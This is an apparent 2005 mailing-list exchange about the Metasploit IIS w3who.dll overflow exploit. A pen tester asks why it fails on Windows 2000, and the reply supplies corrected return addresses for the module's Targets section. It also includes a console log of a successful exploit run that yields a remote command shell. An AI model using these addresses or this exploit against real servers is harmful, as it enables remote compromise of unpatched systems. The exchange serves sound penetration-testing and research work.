The return address for Windows 2000 fails because the ImageBase for the
DLL is different. I forget to check the base address on 2000 after fixing
the code to work on Windows XP SP2 :-(
A new module will be posted to metasploit.com shortly. In the meantime,
just change the return address in the Targets section to one of the
following:
0x01169f4a (pop eax, pop ebp, ret @w3who.dll w/base 0x01150000)
0x75022ac4 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])
0x750236b1 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])
If you run into any other bugs or reliability problems with the Metasploit
Framework, *please* drop us an email at msfdev[at]metasploit.com :-)
-HD
---
msf iis_w3who_overflow(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows 2000 RESKIT DLL (Win2000)
[*] Sending 8254 bytes to remote host.
[*] Waiting for a response...
[*] Got connection from 192.168.0.100:34885 <-> 192.168.0.237:4444
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
On Friday 14 January 2005 02:49, Martin Bernhard wrote:
Hi,
As one of our clients is running some IIS web servers with w3who.dll on
them, I figured that this would be a good place to start our pen test.
Unfortunately, the exploit in the new release of the Metasploit
Framework did not work on the most important servers (Windows 2000). I
have access to a test system that gives me the opportunity to analyze
the bug in detail, but I can?t figure out what parts in memory are
overwritten. Does anybody know what exactly I have to do to trigger the
bug and analyze it (I?m using ollydbg)?
Any help is much appreciated
